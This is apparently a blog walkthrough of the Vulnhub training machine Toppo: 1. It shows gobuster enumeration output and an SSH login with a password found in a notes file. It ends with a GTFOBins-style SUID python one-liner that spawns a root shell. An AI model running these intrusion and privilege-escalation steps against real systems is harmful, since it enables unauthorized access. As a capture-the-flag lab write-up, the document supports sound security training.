Vulnhub - Toppo: 1 | An ordinary day

Introduction

The Machine isn’t hard to own and don’t require advanced exploitation .
Level : Beginner
DHCP : activated
Inside the zip you will find a vmdk file , and I think you will be able to use it with any usual virtualization software ( tested with Virtualbox)

This box is on the NetSecFocus Admin list of OSCP-like machines. It’s TOPPO: 1 from vulnhub. It is just a vmdk file which I ran in Virtualbox: I made a new Linux VM and then opened the disk file. It worked ok.

Ports

This box has:

SSH on 22,
HTTP on port 80,
rpcbind on 111 and (probably) 54036 - I didn’t check, but that port was open.

HTTP

Gobuster gives some results:

root@kali:/opt/vulnhub/toppo# gobuster dir -u http://192.168.1.112 -w /usr/share/seclists/Discovery/Web-Content/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.1.112
[+] Threads:        10
[+] Wordlist:       /usr/share/seclists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/10/19 02:55:47 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/LICENSE (Status: 200)
/admin (Status: 301)
/.hta (Status: 403)
/css (Status: 301)
/img (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/mail (Status: 301)
/manual (Status: 301)
/server-status (Status: 403)
/vendor (Status: 301)
===============================================================
2020/10/19 02:55:49 Finished
===============================================================

In the /admin directory we find notes.txt, which says:

Note to myself : I need to change my password :/ 12345ted123 is too outdated but the technology isn’t my thing i prefer go fishing or watching soccer .

From this we can guess that the username is ted, and we have the password above. We can SSH in.

On the box

Linpeas says that python2.7 has the SUID bit set. Checking /usr/bin we can see python2.7 is symlinked to python. GTFOBins provides a suggestion, which works with a slight modification:

ted@Toppo:/dev/shm$ python -c 'import os; os.execl("/bin/bash", "sh", "-p")'
sh-4.3# whoami
root
sh-4.3# cd /root
sh-4.3# ls
flag.txt
sh-4.3# cat flag.txt

ASCII art removed

Congratulations ! there is your flag : 0wnedlab{p4ssi0n_c0me_with_pract1ce}

And that was that.